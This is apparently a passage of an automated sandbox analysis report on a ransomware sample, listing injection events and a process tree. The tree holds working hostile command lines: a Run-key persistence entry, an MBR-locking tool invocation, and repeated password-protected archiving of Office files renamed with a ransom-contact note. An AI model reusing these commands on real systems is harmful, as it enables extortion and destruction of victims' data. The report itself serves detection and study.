Token: SeShutdownPrivilege	1996	explorer.exe
Token: SeShutdownPrivilege	1996	explorer.exe
Token: SeShutdownPrivilege	1996	explorer.exe
Token: SeShutdownPrivilege	1996	explorer.exe
Token: SeShutdownPrivilege	1996	explorer.exe

Suspicious use of FindShellTrayWindow 24 IoCs

pid	Process
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe
1996	explorer.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1964	nsf.exe
2884	nsf.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1252 wrote to memory of 2348	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 1252 wrote to memory of 2348	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 1252 wrote to memory of 2348	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 1252 wrote to memory of 2348	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 1252 wrote to memory of 2348	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 1252 wrote to memory of 2348	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 1252 wrote to memory of 2348	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	30
PID 1252 wrote to memory of 1964	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 1252 wrote to memory of 1964	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 1252 wrote to memory of 1964	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 1252 wrote to memory of 1964	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 1252 wrote to memory of 1964	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 1252 wrote to memory of 1964	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 1252 wrote to memory of 1964	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	31
PID 1252 wrote to memory of 2724	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 1252 wrote to memory of 2724	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 1252 wrote to memory of 2724	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 1252 wrote to memory of 2724	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 1252 wrote to memory of 2724	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 1252 wrote to memory of 2724	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 1252 wrote to memory of 2724	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	32
PID 1252 wrote to memory of 2428	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 1252 wrote to memory of 2428	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 1252 wrote to memory of 2428	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 1252 wrote to memory of 2428	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 1252 wrote to memory of 2428	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 1252 wrote to memory of 2428	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 1252 wrote to memory of 2428	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	34
PID 1252 wrote to memory of 2904	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 1252 wrote to memory of 2904	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 1252 wrote to memory of 2904	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 1252 wrote to memory of 2904	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 1252 wrote to memory of 2904	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 1252 wrote to memory of 2904	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 1252 wrote to memory of 2904	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	36
PID 1252 wrote to memory of 2728	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 1252 wrote to memory of 2728	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 1252 wrote to memory of 2728	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 1252 wrote to memory of 2728	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 1252 wrote to memory of 2728	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 1252 wrote to memory of 2728	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 1252 wrote to memory of 2728	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	38
PID 1252 wrote to memory of 2612	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 1252 wrote to memory of 2612	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 1252 wrote to memory of 2612	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 1252 wrote to memory of 2612	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 1252 wrote to memory of 2612	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 1252 wrote to memory of 2612	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 1252 wrote to memory of 2612	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	40
PID 1252 wrote to memory of 2680	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 1252 wrote to memory of 2680	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 1252 wrote to memory of 2680	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 1252 wrote to memory of 2680	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 1252 wrote to memory of 2680	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 1252 wrote to memory of 2680	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 1252 wrote to memory of 2680	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	42
PID 1252 wrote to memory of 2088	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 1252 wrote to memory of 2088	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 1252 wrote to memory of 2088	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 1252 wrote to memory of 2088	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 1252 wrote to memory of 2088	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 1252 wrote to memory of 2088	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 1252 wrote to memory of 2088	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	44
PID 1252 wrote to memory of 1012	1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
"C:\Users\Admin\AppData\Local\Temp\3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1252
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -i
  2⤵
  - Executes dropped EXE
  PID:2348
- C:\Windows\SysWOW64\nsf.exe
  "C:\Windows\system32\nsf.exe" /nobootpass /lock Yrs5S2z1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:1964
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2724
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2428
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2904
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2728
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2612
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2680
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2088
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1012
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2792
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2268
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -i
  2⤵
  - Executes dropped EXE
  PID:476
- C:\Windows\SysWOW64\nsf.exe
  "C:\Windows\system32\nsf.exe" /nobootpass /lock Yrs5S2z1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:2884
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1824
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2224
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2256
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1152
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2100
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1112
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1840
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:948
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1092
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:3000
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -s
  2⤵
  - Executes dropped EXE
  PID:1776
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -s
  2⤵
  - Executes dropped EXE
  PID:1148

C:\Windows\SysWOW64\svschost.exe
C:\Windows\SysWOW64\svschost.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Drops file in System32 directory
PID:1040
- C:\Windows\SysWOW64\REG.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "C:\scrlk\svchost.exe" /f
  2⤵
  - Adds Run key to start application
  PID:900
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1784
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:308
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2836
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2236
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1012
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:588
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2908
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2164
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:316
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Setup.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Setup.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2148
- C:\ProgramData\msvkp\svchost.exe
